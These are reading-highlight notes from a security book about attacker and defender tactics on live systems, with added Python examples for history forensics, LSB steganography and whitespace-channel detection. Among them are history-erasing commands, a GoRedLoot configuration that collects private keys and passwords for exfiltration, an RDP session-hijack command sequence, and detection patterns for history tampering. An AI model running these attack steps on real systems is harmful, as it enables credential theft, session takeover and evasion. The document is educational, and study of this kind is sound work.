- By simply installing a tap on both the network and the host, you can verify the host integrity by spotting missing traffic. ([Location 3100](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3100))
- Tags: [[blue]]
- If they are coming in over SSH or another inbound service they have access to, we can drop a random percentage of traffic to hinder and frustrate the attacker: `$ sudo iptables -A INPUT -m statistic --mode random --probability 0.7 -s 0/0 -d 0/0 -p tcp --dport 22 -j DROP` ([Location 3155](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3155))
- Tags: [[blue]]
- Likewise, if you see the attacker has some form of limited access or a basic outbound connection, such as a reverse shell, you can frustrate them by dropping the outbound packets of this tool. By dropping the response, you can still pick up the intel on the commands they send you but make the shell mostly useless as they wait for responses that will never arrive complete: `$ sudo iptables -A OUTPUT -m statistic --mode random --probability 0.7 -s 0/0 -d 0/0 -p tcp --dport 9999 -j DROP` ([Location 3159](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3159))
- Tags: [[blue]]
- Remember, when you're done trolling or testing you can drop your firewall rules with iptables (this also works if you want to drop the defender's rules as an attacker): `$ sudo iptables -F` ([Location 3163](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3163))
- Tags: [[blue]]
- Portspoof isn't a honeypot but instead will show the attackers all ports are open on the target system, and even includes a database to emulate many of these service banners. Rather than reducing port scans to only the available services, the defender will make it appear that all ports are open and running services, ([Location 3168](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3168))
- Tags: [[blue]]
- We can use iptables' tarpit with the following commands. Granted you will need the ports open to begin with, so this tool works very well with Portspoof: `$ sudo iptables -A INPUT -p tcp --dport 3306 -j TARPIT` ([Location 3198](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3198))
- Tags: [[blue]]
- Seatbelt[2]. Seatbelt can check for many common antivirus applications, any applied AppLocker policies, audit policies, local GPOs, Windows Defender settings, Windows Firewall settings, Sysmon policies, and many more configurations. ([Location 3395](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3395))
- Tags: [[blue]]
- pspy does this by monitoring changes to the process list, proc filesystem, and other critical filesystem events through the inotify API. ([Location 3404](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3404))
- Tags: [[pink]]
- `$ go mod init pspy` `$ go mod vendor` `$ go build` `$ ./pspy` ([Location 3409](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3409))
- Tags: [[blue]]
- For example, I always run file and strings on a file in an attempt to understand what it really is before running it. As we saw in previous chapters, you can't trust a file is simply what its name says it is. I also like to run which on any system utilities I may be considering, to make sure they are in the proper location and I can inspect them before running them. Another thing I tend to do early is to check any aliases this user may have, along with the general environment variables, with the command env. ([Location 3416](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3416))
- Tags: [[pink]]
- The command echo * in a Bash shell can be used to list out all available files, even when you can't ls something. One neat trick, if you find a binary has been made read-only, is you can actually use ldd to execute it. The command ldd can be used to load a read-only ELF file into the linker, which subsequently executes it to get the linked libraries[4] ([Location 3422](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3422))
- Tags: [[pink]]
- Disabling Bash history is as simple as unsetting the location of the history file in the shell's environment variables: `$ unset HISTFILE` And clearing it can be done by calling the history command with the c flag to clear: `$ history -c` ([Location 3431](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3431))
- Tags: [[pink]]
- If you find yourself in a Docker instance instead of on the native host, you can attempt to break out in several ways. Again, the scope of Docker escapes is way beyond this chapter, but a really good tool for exploring these escapes is called DEEPCE (Docker Enumeration, Escalation of Privileges and Container Escapes)[5]. ([Location 3458](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3458))
- Tags: [[pink]]
- WireTap is really sweet because it will intercept the keyboard, screen, and even microphone information. WireTap is a one-stop-shop for getting operational information on Windows. ([Location 3512](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3512))
- Tags: [[pink]]
- That said, MimiPenguin can be pretty effective if the user is leveraging a common desktop environment on Kali, Debian, Ubuntu, or even Arch Linux. ([Location 3543](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3543))
- Tags: [[pink]]
- We can also use 3snake, to pull passwords from memory, out of sshd directly[19]. This tool is very nice as it's a fairly accurate memory scanner, and SSH is a ubiquitous remote administration protocol on Linux. That said, you will need to run it persistently in the background somewhere, so it's important to hide it appropriately. ([Location 3547](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3547))
- Tags: [[pink]]
- Let's take a quick look at the important configuration variables on lines 21-27 of GoRedLoot:
  ```go
  // Keyz is our global list of files to stage for exfil
  var Keyz []string
  var encryptPassword = "examplepassword"
  var ignoreNames = []string{"Keychains", ".vmdk", ".vmem", ".npm", ".vscode", ".dmg", "man1", ".ova", ".iso"}
  var ignoreContent = []string{"golang.org/x/crypto"}
  var includeNames = []string{"Cookies"}
  var includeContent = []string{"BEGIN DSA PRIVATE KEY", "BEGIN RSA PRIVATE KEY", "secret", "key", "pass"}
  ```
  And we can call this tool (or inject it into memory) like so on the victim system: `$ ./GoRedLoot /home/ /tmp/initram` We can also use similar Windows tools from SharpCollection, such as SharpDir, SharpShare, and SharpFiles[21], if we are looking for a Windows-specific solution. That said, GoRedLoot is cross-platform and I've had great success using it on Windows, Linux, and even macOS. ([Location 3560](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3560))
- Tags: [[pink]]
- In RDP hijacking, you will need system-level permissions, and you can use the system utility tscon to hijack any existing RDP sessions on the system[30]. ([Location 3684](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3684))
- Tags: [[pink]]
- ```
  > query user
  > sc create ses binpath="cmd.exe /k tscon [victim ID] /dest:[your SESSIONNAME]"
  > net start ses
  ```
  ([Location 3688](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3688))
- Tags: [[pink]]
- On Windows the traditional avenue is abusing Windows Active Directory. Many tools exist for this, such as PowerView, BloodHound, PowerSploit, Impacket, and CrackMapExec just to name a few. ([Location 3698](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3698))
- Tags: [[pink]]
- big part of the defensive considerations here is tipping your hand or signaling to the offense how much you may know. For example, you may not want to upload samples to public repositories like VirusTotal. You also may not want to respond on a host such that you don't let the offense know you can detect their current tooling. For example, you may want to finish scoping the infection, to see what other hosts they have accessed, before cutting their current access and thus tipping your hand. We will cover these concepts of when to respond more in Chapter 8, Clearing the Field, but for now, let's look at some options for when you do decide to expel an attacker. ([Location 3718](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3718))
- Tags: [[pink]]
- Commands like `netstat -antp` and `lsof -i` ([Location 3730](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3730))
- Tags: [[pink]]
- We can also do this on Windows leveraging the Windows firewall using PowerShell with: `> New-NetFirewallRule -DisplayName "AttackerX 1 IP In" -Direction Inbound -LocalPort Any -Protocol TCP -Action Block -RemoteAddress 172.31.33.7` And again blocking reverse connections with something like: `> New-NetFirewallRule -DisplayName "AttackerX 1 IP Out" -Direction Outbound -LocalPort Any -Protocol TCP -Action Block -RemoteAddress 172.31.33.7` ([Location 3762](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3762))
- Tags: [[pink]]
- On Windows with local accounts, Microsoft actually provides a really nice script for this, known as Local-PasswordRoll.ps1 (https://support.microsoft.com/en-us/topic/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevation-of-privilege-may-13-2014-60734e15-af79-26ca-ea53-8cd617073c30). This script can work remotely with other machines via WinRM, which makes it great for ad hoc administration of many Windows machines, although I've also edited a version you can use to change local passwords without needing WinRM enabled (https://gist.github.com/ahhh/92fc42f9a0c1bcb0d8f42fe52f83f9a3). ([Location 3819](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3819))
- Tags: [[pink]]
- `Invoke-PasswordRoll -LocalAccounts @("Administrator", "example_user") -TsVFileName "newpws.tsv" -EncryptionKey "secretvalue"` Later, if you want to view the newly set passwords, you can read them out of the encrypted file with the key specified: `> ConvertTo-CleartextPassword -EncryptionKey "secretvalue" -EncryptedPassword 76492d1116743f0423413b16050a5345MgB8ADQANAB4AEcATwBkAGYATQA4AFQAWgBZAEsAOQBrAGYANQBpADMAOQBwAFEAPQA9AHwANwBjADEAZgA2ADgAMAAwADIAOAAxAGUANgBlADQAOQA2ADQAYwBkADUAYwBhADIANgA1ADgANwA5AGQAYwA4ADAAYgBiAGUAZgBhADkANwBlADMANwA2ADMAMQA3AGMAZQAyADIAZgA4ADMANwBiAGQANwA3ADcAYwAwADQAZgAyAGUANAAxAGEAZQA1ADcAYgAxADYAMABkADMAZABjADgAZQBhAGQAZgAyADIAZQBjAGEAYgAwADkAZgA4AGMA` ([Location 3828](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3828))
- Tags: [[pink]]
- In fact, there are entire toolsets designed for bypassing chroot, such as chw00t[36]. ([Location 3862](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3862))
- Tags: [[pink]]
- One idea in looking for user abuse or trapping attacker persistence is setting up skeleton templates for new users. As we saw in previous chapters, attackers will very often create new accounts on a system as a way to get back in. By applying default controls to new users, we can catch these simple persistence techniques with our own counter-techniques. skel works by applying anything in `/etc/skel/` to all new users created. So we can give them things like a custom `.bash_profile` or `.bashrc` in their home directory before they ever log in. For example, we can change the default location of their history file, such that an attacker may not notice their bash_history is being recorded. Further, we can add timestamps to the history file to make it a little better for forensic analysis: `# echo 'HISTFILE=/var/log/user_history' >> /etc/skel/.bashrc` `# echo 'HISTTIMEFORMAT="%d/%m/%y %T"' >> /etc/skel/.bashrc` Another thing you can do, if you know a specific account is being abused, is change that account's default login shell to an alert program you control or something like rootsh, the shell keylogger we saw earlier. rootsh is a shell wrapper that will collect all information entered into the session, making it just as valuable for defensive teams as for the offense. To change a user's default shell, edit `/etc/passwd` as we saw in the previous section with the offense. ([Location 3891](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3891))
- Tags: [[pink]]
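The two highlights above (the attacker's `unset HISTFILE` / `history -c` trick and the defender's skel-provisioned, timestamped history file) meet in the file the defender ends up reading. This is an added example, not code from the book: it turns a Bash history written with `HISTTIMEFORMAT` set (Bash then stores a `#<epoch>` comment line before each command) into a timeline and flags history-clearing commands. The sample history is constructed, and the `PROMPT_COMMAND='history -a'` line in the skel helper is my addition, not the book's: without it Bash only writes history at logout, so a session that unsets `HISTFILE` early leaves nothing behind.

```python
"""Timeline a Bash history file written with HISTTIMEFORMAT set (added example)."""
import re
from datetime import datetime, timezone
from typing import List, NamedTuple, Optional

# Constructed sample of what /var/log/user_history could contain for one account.
SAMPLE_HISTORY = """#1712345600
ls -la
#1712345660
cat /etc/passwd
#1712345720
unset HISTFILE
#1712345780
history -c
#1712345840
useradd -m support2
"""

# Bash writes "#<unix epoch>" before each command when HISTTIMEFORMAT is set.
EPOCH_MARKER = re.compile(r"^#(\d{9,11})$")

# Commands that suggest the user is trying to stop or erase shell history.
ANTI_FORENSIC_PATTERNS = [
    re.compile(r"\bunset\s+HISTFILE\b"),
    re.compile(r"\bhistory\s+-c\b"),
    re.compile(r"\bHISTFILE=/dev/null\b"),
    re.compile(r"\bHISTSIZE=0\b"),
]


class HistoryEntry(NamedTuple):
    when: Optional[datetime]  # None when no epoch marker preceded the command
    command: str


def skel_bashrc_lines(history_path: str = "/var/log/user_history") -> List[str]:
    """Lines to append to /etc/skel/.bashrc so every new account logs timestamped history.

    The PROMPT_COMMAND line is an assumption added here (not from the book): it makes
    Bash append each command to the file immediately instead of only at logout.
    """
    return [
        f"HISTFILE={history_path}",
        'HISTTIMEFORMAT="%d/%m/%y %T "',
        "PROMPT_COMMAND='history -a'",
    ]


def parse_history(text: str) -> List[HistoryEntry]:
    """Pair each command with the epoch marker that precedes it, if any."""
    entries: List[HistoryEntry] = []
    pending: Optional[datetime] = None
    for line in text.splitlines():
        if not line.strip():
            continue
        marker = EPOCH_MARKER.match(line)
        if marker:
            pending = datetime.fromtimestamp(int(marker.group(1)), tz=timezone.utc)
            continue
        entries.append(HistoryEntry(pending, line))
        pending = None
    return entries


def flag_anti_forensics(entries: List[HistoryEntry]) -> List[HistoryEntry]:
    """Return the entries whose command matches a history-tampering pattern."""
    return [e for e in entries if any(p.search(e.command) for p in ANTI_FORENSIC_PATTERNS)]


if __name__ == "__main__":
    timeline = parse_history(SAMPLE_HISTORY)
    for entry in timeline:
        stamp = entry.when.isoformat() if entry.when else "unknown"
        print(f"{stamp}  {entry.command}")
    for entry in flag_anti_forensics(timeline):
        print("anti-forensic command:", entry.command)
```

Because the relocated file sits under `/var/log` rather than in the user's home directory, `history -c` only empties the in-memory list of the current shell; the lines already appended stay on disk for the timeline.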
- One book that serves as a good introduction to the basic techniques of memory corruption is Hacking: The Art of Exploitation[2]. Following that, there are three exploit development courses on https://OpenSecurityTraining.info that I recommend if you want to continue to develop your techniques[3]. Another amazing course comes from RET2[4]; their online wargame-like demo is amazing, although a little pricey[5]. A similar, yet free, version of this course is the RPISEC Modern Binary Exploitation (MBE) course[6] ([Location 4083](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4083))
- Tags: [[pink]]
- I also recommend the Corelan free and paid training[7] if you are looking to get into more advanced techniques here. If you're looking to get into heap exploitation, there is a really great guide by the legendary CTF team, Shellphish, called how2heap[8]. Exploit ([Location 4091](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4091))
- Tags: [[pink]]
- Speaking of generic password lists for cracking, red teams often collect generic passwords from lists like RockYou or these exposed credential dumps: https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases. The collection of the credential sets is important for spraying or enumerating access. Likewise, toolsets to spray the credentials in a usable way are equally important. I like using Hydra[17] because it's so versatile, but there is also go-netscan[18] for the same purposes. ([Location 4140](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4140))
- Tags: [[pink]]
- Repo-diff is a tool that can help detect when a repository has been hijacked with a namespace takeover or has an existing collision (https://github.com/sonatype-nexus-community/repo-diff), something both offensive and defensive teams can leverage. ([Location 4199](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4199))
- Tags: [[pink]]
- The effect of NAT Slipstreaming is that by getting a victim to visit a website, the attacker can then get full network access to the victim's local network. At a high level, this works by abusing the SIP ([Location 4212](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4212))
- Tags: [[pink]]
- One method we can use for generating and disseminating our analysis is F3EAD. F3EAD is a model used in military intelligence targeting that stands for Find, Fix, Finish, Exploit, Analyze, and Disseminate. ([Location 4244](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4244))
- Tags: [[pink]]
- Threat modeling boils down to hypothesizing how you will get attacked and the risks associated with those attacks. Risk is the likelihood of an event multiplied by the impact of the event, which are estimates we can use to guide which threats we will flush out with threat modeling. ([Location 4266](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4266))
- Tags: [[pink]]
- Another amazing example of developing detections based on threat modeling is Andrew Oliveau's BeaconHunter[34]. Andrew knew that the NCCDC red team used Cobalt Strike ([Location 4283](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4283))
- Tags: [[pink]]
- ShimCache became the AmCache with Windows 8 and underwent some major changes. This now keeps a record of every application that has run, its path, creation, and last modified date, along with the SHA1 of the PE[37]. Essentially, whenever a program runs, a service called AeLookupService checks whether that program should be shimmed with the application compatibility features. Then, around 12:30 every day, the task scheduler will flush that cache to a file in %WinDir%\AppCompat\Programs with the timestamp and file path of the file execution. ([Location 4299](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4299))
- Tags: [[pink]]
- The classic example is hiding data in images with steganography, by using techniques such as the least significant byte (LSB) of a color or a pixel to encode hidden data[2]. ([Location 4489](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4489))
- Tags: [[pink]]
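To make the LSB technique in the highlight concrete from the analyst's side, here is an added example (not the book's code) on a constructed grayscale "image" modelled as a byte buffer: it hides a payload one bit per pixel in the lowest bit, then shows why this is invisible to the eye (every altered pixel moves by exactly 1) and one statistic a defender can compute without a clean reference copy, the mean run length of the LSB plane, which drops sharply in smooth regions once data has been written into them. The carrier, payload and 32-bit length header are all assumptions of this example.

```python
"""LSB steganography on a constructed pixel buffer, with a simple detection statistic (added example)."""
from typing import Tuple

HEADER_BITS = 32  # payload length prefix, an assumption of this example


def make_carrier(n: int = 4096) -> bytes:
    """Constructed smooth gradient standing in for a flat region of an image."""
    return bytes(i * 255 // n for i in range(n))


def lsb_embed(pixels: bytes, payload: bytes) -> bytes:
    """Write a length header plus payload into the least significant bit of each pixel."""
    header = len(payload).to_bytes(HEADER_BITS // 8, "big")
    bits = "".join(format(b, "08b") for b in header + payload)
    if len(bits) > len(pixels):
        raise ValueError("carrier too small for payload")
    out = bytearray(pixels)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | int(bit)
    return bytes(out)


def lsb_extract(pixels: bytes) -> bytes:
    """Read the header, then that many bytes, back out of the LSB plane."""
    def read_bits(start: int, count: int) -> int:
        value = 0
        for i in range(start, start + count):
            value = (value << 1) | (pixels[i] & 1)
        return value

    length = read_bits(0, HEADER_BITS)
    if HEADER_BITS + length * 8 > len(pixels):
        raise ValueError("header claims more data than the carrier holds")
    return bytes(read_bits(HEADER_BITS + 8 * k, 8) for k in range(length))


def carrier_diff(original: bytes, stego: bytes) -> Tuple[int, int]:
    """Number of pixels changed and the largest per-pixel change."""
    changed = sum(1 for a, b in zip(original, stego) if a != b)
    max_delta = max((abs(a - b) for a, b in zip(original, stego)), default=0)
    return changed, max_delta


def mean_lsb_run_length(pixels: bytes) -> float:
    """Average length of runs of identical LSBs; smooth image regions give long runs,
    embedded data gives runs close to 2."""
    runs = 1
    for a, b in zip(pixels, pixels[1:]):
        if (a & 1) != (b & 1):
            runs += 1
    return len(pixels) / runs


if __name__ == "__main__":
    carrier = make_carrier()
    secret = b"constructed secret " * 10
    stego = lsb_embed(carrier, secret)
    print("recovered:", lsb_extract(stego)[:19])
    print("pixels changed / max delta:", carrier_diff(carrier, stego))
    print("LSB run length clean vs stego: %.1f vs %.1f"
          % (mean_lsb_run_length(carrier), mean_lsb_run_length(stego)))
```

Real images carry sensor noise that already randomises the LSB plane in textured areas, so the run-length statistic is only a first pass; in practice it is applied to flat regions (sky, walls) where a clean LSB plane is structured and an embedded one is not.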
- The old open-source tool Snow is designed to encrypt data and encode it into a whitespace cipher to be included at the end of text[4]. Other such tricks include substitution ciphers where the data being exfiltrated is replaced with benign data and decoded later using the same substitution cipher. ([Location 4494](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4494))
- Tags: [[pink]]
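The whitespace channel described above is easy to miss because editors and renderers discard trailing spaces and tabs. The following added example (not the book's code, and not Snow's actual encoding) builds a toy version of the channel, one byte per line as eight trailing characters with space as 0 and tab as 1, purely to produce realistic input for the part a defender cares about: a scanner that flags lines whose trailing whitespace mixes tabs and spaces or is unusually long. The cover text and the eight-character framing are assumptions.

```python
"""Trailing-whitespace covert channel: toy encoder plus a defender's detector (added example)."""
from typing import List, Tuple

# Constructed cover text with no trailing whitespace of its own.
COVER_TEXT = "Meeting notes\nAction items for Monday\nBudget review pending\nEnd of document\n"

Finding = Tuple[int, int, str]  # (line number, trailing whitespace length, reason)


def encode_trailing_whitespace(cover: str, payload: bytes) -> str:
    """Toy channel: append one payload byte per line as 8 chars (space=0, tab=1)."""
    lines = cover.splitlines()
    if len(payload) > len(lines):
        raise ValueError("not enough cover lines for the payload")
    out = []
    for i, line in enumerate(lines):
        line = line.rstrip(" \t")
        if i < len(payload):
            bits = format(payload[i], "08b")
            line += "".join("\t" if b == "1" else " " for b in bits)
        out.append(line)
    return "\n".join(out) + "\n"


def decode_trailing_whitespace(text: str) -> bytes:
    """Inverse of the toy channel: every 8-char trailing run is one byte."""
    data = bytearray()
    for line in text.splitlines():
        tail = line[len(line.rstrip(" \t")):]
        if len(tail) == 8:
            data.append(int("".join("1" if c == "\t" else "0" for c in tail), 2))
    return bytes(data)


def find_whitespace_channels(text: str, min_tail: int = 4) -> List[Finding]:
    """Flag lines whose trailing whitespace looks like a carrier rather than sloppy editing.

    Mixed tabs and spaces at end of line are the strongest signal; a run of only tabs
    or a long run of only spaces is reported with a weaker reason string.
    """
    findings: List[Finding] = []
    for number, line in enumerate(text.splitlines(), 1):
        tail = line[len(line.rstrip(" \t")):]
        if len(tail) < min_tail:
            continue
        if " " in tail and "\t" in tail:
            findings.append((number, len(tail), "mixed tabs and spaces"))
        elif "\t" in tail:
            findings.append((number, len(tail), "trailing tabs"))
        else:
            findings.append((number, len(tail), "long trailing spaces"))
    return findings


if __name__ == "__main__":
    stego = encode_trailing_whitespace(COVER_TEXT, b"hi")
    print(repr(stego))
    print("decoded:", decode_trailing_whitespace(stego))
    for finding in find_whitespace_channels(stego):
        print("suspicious line %d: %d trailing chars (%s)" % finding)
```

A scanner like this belongs on outbound mail and document gateways; stripping trailing whitespace on egress destroys the channel cheaply, while logging the findings tells you which documents and senders to look at.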
- Tailored Access Operations (TAO), part of the NSA that performs offensive operations, would exfiltrate data using a man-on-the-side attack, where they could send data to arbitrary hosts and collect that data along the route where they had a presence on the supporting infrastructure[7]. ([Location 4505](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4505))
- Tags: [[pink]]
- Using a public anonymity network like Tor is a popular option for attackers, but this is also easy to block from a corporate point of view, as they provide a real-time list of all their exit nodes[8]. ([Location 4516](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4516))
- Tags: [[pink]]
- There are still ways to scrape Pastebin; for example, projects such as pystemon can still monitor and scrape Pastebin for regexes[9]. It does this by scraping the archive of recently uploaded pastes and searching their raw entries directly, without the API. It also supports scraping sites such as slexy.org, gist.github.com, paste.org.ru, kpaste.net, ideone.com, pastebin.fr, and pastebin.gr. That said, many attackers have moved on to new paste services such as 0bin.net, snippet.host, and privatebin.info. 0bin.net is an interesting implementation that uses JavaScript in the browser to AES256 encrypt the pastebin content. ([Location 4520](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4520))
- Tags: [[pink]]
- The reason I mention snippet.host is because it also supports a Tor service, so people can connect, read, and post over Tor. ([Location 4535](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4535))
- Tags: [[pink]]
- Using compromised hosts, or even pivoting through a paid botnet, is a very real technique for anonymizing malicious traffic. ([Location 4547](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4547))
- Tags: [[pink]]
- A legal alternative may be to use a VPN or proxy network, which allows attackers to egress out of specific geolocations or even types of service providers. ([Location 4548](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4548))
- Tags: [[pink]]
- Instead of serving ads to their free tier users, they monetize the platform by using the free VPN users as egress locations for the paid users. ([Location 4550](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4550))
- Tags: [[pink]]
- like to use kill dates in competition environments because if the malware leaks, it can't be used by other actors after the competition ends. Gscript is a great dropper platform because you can easily add gscripts with a kill date to any other collection of offensive tools, limiting the entire tool chain's execution with a high priority script that will stop execution past a certain date[11] ([Location 4632](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4632))
- Tags: [[pink]]
- If you think you've caught the initial compromise, it may be safe to respond with just a brief triage or remediating a single host. However, if you think you've caught a large, ubiquitous infection, you will want to scope the full incident before responding to any one host. ([Location 4666](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4666))
- Tags: [[pink]]
- Ultimately, you should follow the evidence and rebuild any hosts or rotate any accounts the attacker has touched. ([Location 4713](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4713))
- Tags: [[pink]]
- Remember, when you are rotating credentials on a Windows domain controller, you will need to reset the passwords twice to change the krbtgt hash[12]. If the krbtgt hash is stolen, it can be used to generate a golden ticket and give attackers persistent access to the domain. A golden ticket allows an attacker to sign Kerberos tickets for any user, granting them any permissions in the domain they wish[13]. This is an extremely important step to take if your domain controller has been compromised. ([Location 4725](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4725))
- Tags: [[pink]]
- From the nightmare scenario of a failed remediation to the big flip technique we covered, quarantining an actor is a delicate balance of speed and planning. ([Location 4766](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=4766))
- Tags: [[pink]]